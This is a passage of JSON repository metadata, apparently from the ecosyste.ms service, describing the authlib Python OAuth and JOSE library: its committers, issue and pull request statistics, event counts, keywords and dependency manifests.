Kolman","email":"j.kolman@minddistrict.com","login":"janwijbrand","count":1},{"name":"Pablo Marti","email":"pmargam@gmail.com","login":"pmarti","count":1},{"name":"Nickolai Zeldovich","email":"nickolai@csail.mit.edu","login":"zeldovich","count":1},{"name":"Nick Pope","email":"nick@nickpope.me.uk","login":"ngnpope","count":1},{"name":"Muhammad Noman Ilyas","email":"113287211+AL-Cybision","login":"AL-Cybision","count":1},{"name":"Mohamed Elhedi Ben Yedder","email":"mohamedelhedi.benyedder@coachess.net","login":"MohamedElhedi-BenYedder","count":1},{"name":"Michalis Mengisoglou","email":"michalis.mengisoglou@gmail.com","login":"michalismeng","count":1},{"name":"Michal Josífko","email":"michal.josifko@gmail.com","login":"mjos","count":1},{"name":"Max Zhenzhera","email":"59729293+maxzhenzhera","login":"maxzhenzhera","count":1},{"name":"Max Goodhart","email":"c@chromakode.com","login":"chromakode","count":1},{"name":"Markéta","email":"meggy.calabkova@gmail.com","login":"MeggyCal","count":1},{"name":"Marc Leonard","email":"marc.r.leonard@gmail.com","login":"marcrleonard","count":1},{"name":"Maic Siemering","email":"maic@siemering.tech","login":"eruvanos","count":1},{"name":"Lukas Schink","email":"l.schink@stud.uni-hannover.de","login":"d1c3","count":1},{"name":"Ludvig Hozman","email":"ludvig123@gmail.com","login":"LudvigHz","count":1},{"name":"Ludovic VAUGEOIS PEPIN","email":"ludovicvp@gmail.com","login":"ulodciv","count":1},{"name":"Leogout","email":"leogout@gmail.com","login":"leogout","count":1},{"name":"Laurie O","email":"laurie_opperman@hotmail.com","login":"EpicWink","count":1},{"name":"James Chien","email":"shc261392@gmail.com","login":"shc261392","count":1}],"past_year_committers":[{"name":"Éloi Rivard","email":"eloi@yaal.coop","login":"azmeuk","count":125},{"name":"Hsiaoming Yang","email":"me@lepture.com","login":"lepture","count":54},{"name":"Félix Rohrlich","email":"felix@yaal.coop","login":null,"count":4},{"name":"Alex Ball","email":"alex-ball","login":"alex-ball","count":3},{"name":"dependabot[bot]","email":"49699333+dependabot[bot]","login":"dependabot[bot]","count":1},{"name":"Thomas Scholtes","email":"geigerzaehler@axiom.fm","login":"geigerzaehler","count":1},{"name":"Songmin Li","email":"lisongmin@protonmail.com","login":"lisongmin","count":1},{"name":"Muhammad Noman Ilyas","email":"113287211+AL-Cybision","login":"AL-Cybision","count":1},{"name":"Laurie O","email":"laurie_opperman@hotmail.com","login":"EpicWink","count":1},{"name":"Florian Preinstorfer","email":"site-github@nblock.org","login":"nblock","count":1},{"name":"Christian Clauss","email":"cclauss@me.com","login":"cclauss","count":1},{"name":"Ben Davis","email":"bendavis78@gmail.com","login":"bendavis78","count":1}],"commits_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/commits","host":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2026-04-01T00:00:08.934Z","repositories_count":6206296,"commits_count":926855740,"contributors_count":35782347,"owners_count":1143144,"icon_url":"https://github.com/github.png","host_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories"}},"issues":{"table":{"full_name":"authlib/authlib","html_url":"https://github.com/authlib/authlib","last_synced_at":"2026-01-12T08:37:13.447Z","status":"active","issues_count":47,"pull_requests_count":53,"avg_time_to_close_issue":38836403.294117644,"avg_time_to_close_pull_request":768373.3125,"issues_closed_count":17,"pull_requests_closed_count":32,"pull_request_authors_count":19,"issue_authors_count":34,"avg_comments_per_issue":1.7872340425531914,"avg_comments_per_pull_request":0.6981132075471698,"merged_pull_requests_count":30,"bot_issues_count":0,"bot_pull_requests_count":1,"past_year_issues_count":32,"past_year_pull_requests_count":46,"past_year_avg_time_to_close_issue":2781870.909090909,"past_year_avg_time_to_close_pull_request":750639.0,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":13,"past_year_issue_authors_count":20,"past_year_avg_comments_per_issue":1.0625,"past_year_avg_comments_per_pull_request":0.5869565217391305,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":24,"created_at":"2025-04-30T08:10:47.631Z","updated_at":"2026-01-12T08:37:13.447Z","repository_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib","issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/issues","issue_labels_count":{"table":{"spec":7,"role:authorization_server":6,"documentation":5,"bug":4,"client":3,"server":3,"integration:httpx":2,"jose":2,"good first issue":2,"spec:rfc6749":1,"Security":1,"question":1,"role:client":1,"integration:flask":1,"integration:requests":1}},"pull_request_labels_count":{"table":{"bug":2,"role:authorization_server":2,"documentation":1,"feature request":1,"dependencies":1,"github_actions":1}},"issue_author_associations_count":{"table":{"NONE":34,"MEMBER":11,"CONTRIBUTOR":2}},"pull_request_author_associations_count":{"table":{"MEMBER":28,"NONE":18,"CONTRIBUTOR":7}},"issue_authors":{"table":{"azmeuk":11,"markhobson":3,"bendavis78":2,"InfernalAzazel":1,"Jsalaz1989":1,"MaidScientistIzutsumiMarin":1,"kimminw00":1,"rcludwick":1,"NomAnor":1,"ziwang-com":1,"spenhand":1,"hfroot":1,"agentydragon":1,"Aetylus":1,"se7entynine":1,"piraces":1,"thatguysimon":1,"krkd":1,"ryandawsonuk":1,"elaamrani":1,"mcepl":1,"bruceduhamel":1,"brad-getpassport":1,"Avantol13":1,"LevN0":1,"iivanov-qb":1,"kaorihinata":1,"vvdanila":1,"mabuelatta-cohere":1,"jaap3":1,"ibizaman":1,"maia-iyer":1,"RafalSkolasinski":1,"caarmen":1}},"pull_request_authors":{"table":{"azmeuk":23,"lepture":5,"shc261392":3,"zachswasey":3,"EpicWink":2,"MartinPaulEve":2,"Aetylus":2,"aliaksei-protchanka":2,"jdeepee":1,"AL-Cybision":1,"yannj-fr":1,"V02460":1,"hxtmdev":1,"kursataktas":1,"thibault-tiro":1,"shininglegend":1,"dependabot[bot]":1,"bendavis78":1,"ShaikAyesha17":1}},"host":{"table":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2026-01-13T00:00:08.926Z","repositories_count":12754834,"issues_count":35853516,"pull_requests_count":117899501,"authors_count":11091246,"icon_url":"https://github.com/github.png","host_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories","owners_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/owners","authors_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors"}},"past_year_issue_labels_count":{"table":{"role:authorization_server":6,"spec":5,"bug":4,"integration:httpx":2,"documentation":1,"spec:rfc6749":1,"server":1,"jose":1,"role:client":1,"integration:flask":1,"integration:requests":1}},"past_year_pull_request_labels_count":{"table":{"bug":2,"role:authorization_server":2,"documentation":1,"feature request":1,"dependencies":1,"github_actions":1}},"past_year_issue_author_associations_count":{"table":{"NONE":20,"MEMBER":10,"CONTRIBUTOR":2}},"past_year_pull_request_author_associations_count":{"table":{"MEMBER":27,"NONE":16,"CONTRIBUTOR":3}},"past_year_issue_authors":{"table":{"azmeuk":10,"markhobson":3,"bendavis78":2,"ziwang-com":1,"vvdanila":1,"spenhand":1,"se7entynine":1,"MaidScientistIzutsumiMarin":1,"maia-iyer":1,"LevN0":1,"kimminw00":1,"kaorihinata":1,"InfernalAzazel":1,"iivanov-qb":1,"ibizaman":1,"caarmen":1,"bruceduhamel":1,"brad-getpassport":1,"Avantol13":1,"Aetylus":1}},"past_year_pull_request_authors":{"table":{"azmeuk":22,"lepture":5,"zachswasey":3,"shc261392":3,"aliaksei-protchanka":2,"MartinPaulEve":2,"EpicWink":2,"Aetylus":2,"AL-Cybision":1,"yannj-fr":1,"dependabot[bot]":1,"bendavis78":1,"ShaikAyesha17":1}},"maintainers":[{"table":{"login":"azmeuk","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/azmeuk"}},{"table":{"login":"lepture","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lepture"}}],"active_maintainers":[{"table":{"login":"azmeuk","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/azmeuk"}},{"table":{"login":"lepture","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lepture"}}]}},"events":{"total":{"CreateEvent":10,"ReleaseEvent":3,"IssuesEvent":50,"WatchEvent":209,"DeleteEvent":4,"IssueCommentEvent":91,"PushEvent":39,"PullRequestReviewEvent":32,"PullRequestReviewCommentEvent":20,"PullRequestEvent":38,"ForkEvent":24},"last_year":{"CreateEvent":10,"ReleaseEvent":3,"IssuesEvent":50,"WatchEvent":209,"DeleteEvent":4,"IssueCommentEvent":91,"PushEvent":39,"PullRequestReviewEvent":32,"PullRequestReviewCommentEvent":20,"PullRequestEvent":38,"ForkEvent":24}},"keywords":["django","flask","jose","jwe","jwk","jws","jwt","oauth","oauth2","oauth2-provider","oauth2-server","oidc","openid-connect"],"dependencies":[{"ecosystem":"actions","filepath":".github/workflows/codeql-analysis.yml","sha":null,"kind":"manifest","created_at":"2023-02-09T23:45:56.248Z","updated_at":"2023-02-09T23:45:56.248Z","repository_link":"https://github.com/authlib/authlib/blob/main/.github/workflows/codeql-analysis.yml","dependencies":[{"id":7508347173,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":7508347175,"package_name":"github/codeql-action/init","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false},{"id":7508347177,"package_name":"github/codeql-action/analyze","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/python.yml","sha":null,"kind":"manifest","created_at":"2023-02-09T23:45:56.461Z","updated_at":"2023-02-09T23:45:56.461Z","repository_link":"https://github.com/authlib/authlib/blob/main/.github/workflows/python.yml","dependencies":[{"id":7508350618,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":7508350619,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":7508350620,"package_name":"codecov/codecov-action","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"pypi","filepath":"setup.py","sha":null,"kind":"manifest","created_at":"2023-02-09T23:45:56.853Z","updated_at":"2023-02-09T23:45:56.853Z","repository_link":"https://github.com/authlib/authlib/blob/main/setup.py","dependencies":[{"id":7508354234,"package_name":"cryptography","ecosystem":"pypi","requirements":"\u003e=3.2","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"pypi","filepath":"tests/requirements-base.txt","sha":null,"kind":"manifest","created_at":"2023-02-09T23:45:57.176Z","updated_at":"2023-02-09T23:45:57.176Z","repository_link":"https://github.com/authlib/authlib/blob/main/tests/requirements-base.txt","dependencies":[{"id":7508356207,"package_name":"cryptography","ecosystem":"pypi","requirements":"*","direct":true,"kind":"test","optional":false},{"id":7508356208,"package_name":"pytest","ecosystem":"pypi","requirements":"*","direct":true,"kind":"test","optional":false},{"id":7508356209,"package_name":"coverage","ecosystem":"pypi","requirements":"*","direct":true,"kind":"test","optional":false}]},{"ecosystem":"pypi","filepath":"tests/requirements-clients.txt","sha":null,"kind":"manifest","created_at":"2023-02-09T23:45:57.227Z","updated_at":"2023-02-09T23:45:57.227Z","repository_link":"https://github.com/authlib/authlib/blob/main/tests/requirements-clients.txt","dependencies":[{"id":7508358164,"package_name":"requests","ecosystem":"pypi","requirements":"*","direct":true,"kind":"test","optional":false},{"id":7508358167,"package_name":"anyio","ecosystem":"pypi","requirements":"*","direct":true,"kind":"test","optional":false},{"id":7508358169,"package_name":"httpx","ecosystem":"pypi","requirements":"*","direct":true,"kind":"test","optional":false},{"id":7508358171,"package_name":"starlette","ecosystem":"pypi","requirements":"*","direct":true,"kind":"test","optional":false},{"id":7508358172,"package_name":"cachelib","ecosystem":"pypi","requirements":"*","direct":true,"kind":"test","optional":false},{"id":7508358175,"package_name":"werkzeug","ecosystem":"pypi","requirements":"*","direct":true,"kind":"test","optional":false},{"id":7508358177,"package_name":"flask","ecosystem":"pypi","requirements":"*","direct":true,"kind":"test","optional":false},{"id":7508358178,"package_name":"django","ecosystem":"pypi","requirements":"*","direct":true,"kind":"test","optional":false},{"id":7508358180,"package_name":"pytest-asyncio","ecosystem":"pypi","requirements":"*","direct":true,"kind":"test","optional":false}]},{"ecosystem":"pypi","filepath":"tests/requirements-django.txt","sha":null,"kind":"manifest","created_at":"2023-02-09T23:45:57.463Z","updated_at":"2023-02-09T23:45:57.463Z","repository_link":"https://github.com/authlib/authlib/blob/main/tests/requirements-django.txt","dependencies":[{"id":7508361248,"package_name":"Django","ecosystem":"pypi","requirements":"*","direct":true,"kind":"test","optional":false},{"id":7508361249,"package_name":"pytest-django","ecosystem":"pypi","requirements":"*","direct":true,"kind":"test","optional":false}]},{"ecosystem":"pypi","filepath":"tests/requirements-flask.txt","sha":null,"kind":"manifest","created_at":"2023-02-09T23:45:57.525Z","updated_at":"2023-02-09T23:45:57.525Z","repository_link":"https://github.com/authlib/authlib/blob/main/tests/requirements-flask.txt","dependencies":[{"id":7508362181,"package_name":"Flask","ecosystem":"pypi","requirements":"*","direct":true,"kind":"test","optional":false},{"id":7508362183,"package_name":"Flask-SQLAlchemy","ecosystem":"pypi","requirements":"*","direct":true,"kind":"test","optional":false}]},{"ecosystem":"pypi","filepath":"docs/requirements.txt","sha":null,"kind":"manifest","created_at":"2023-11-21T14:48:54.350Z","updated_at":"2023-11-21T14:48:54.350Z","repository_link":"https://github.com/authlib/authlib/blob/main/docs/requirements.txt","dependencies":[{"id":14638600772,"package_name":"cryptography","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":14638600773,"package_name":"pycryptodomex","ecosystem":"pypi","requirements":"\u003e=3.10,\u003c4","direct":true,"kind":"runtime","optional":false},{"id":14638600774,"package_name":"Flask","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":14638600775,"package_name":"Django","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":14638600776,"package_name":"SQLAlchemy","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":14638600777,"package_name":"requests","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":14638600778,"package_name":"httpx","ecosystem":"pypi","requirements":"\u003e=0.18.2","direct":true,"kind":"runtime","optional":false},{"id":14638600779,"package_name":"starlette","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false},{"id":14638600780,"package_name":"sphinx","ecosystem":"pypi","requirements":"==6.2.1","direct":true,"kind":"runtime","optional":false},{"id":14638600781,"package_name":"sphinx-design","ecosystem":"pypi","requirements":"==0.4.1","direct":true,"kind":"runtime","optional":false},{"id":14638604547,"package_name":"sphinx-copybutton","ecosystem":"pypi","requirements":"==0.5.2","direct":true,"kind":"runtime","optional":false},{"id":14638604548,"package_name":"shibuya","ecosystem":"pypi","requirements":"*","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"pypi","filepath":"pyproject.toml","sha":null,"kind":"manifest","created_at":"2023-11-21T14:48:58.282Z","updated_at":"2023-11-21T14:48:58.282Z","repository_link":"https://github.com/authlib/authlib/blob/main/pyproject.toml","dependencies":[]},{"ecosystem":"actions","filepath":".github/workflows/pypi.yml","sha":null,"kind":"manifest","created_at":"2023-12-30T02:55:45.925Z","updated_at":"2023-12-30T02:55:45.925Z","repository_link":"https://github.com/authlib/authlib/blob/main/.github/workflows/pypi.yml","dependencies":[{"id":15344129915,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":15344129916,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"v4","direct":true,"kind":"composite","optional":false},{"id":15344129917,"package_name":"actions/upload-artifact","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":15344129918,"package_name":"actions/download-artifact","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":15344129920,"package_name":"pypa/gh-action-pypi-publish","ecosystem":"actions","requirements":"release/v1","direct":true,"kind":"composite","optional":false}]}],"score":32.623957694301765,"created_at":"2025-10-10T19:25:46.032Z","updated_at":"2026-06-19T23:01:34.581Z","avatar_url":"https://github.com/authlib.png","language":"Python","codemeta":null,"publiccode":null,"project_url":"https://summary.ecosyste.ms/api/v1/projects/369010","html_url":"https://summary.ecosyste.ms/projects/369010"}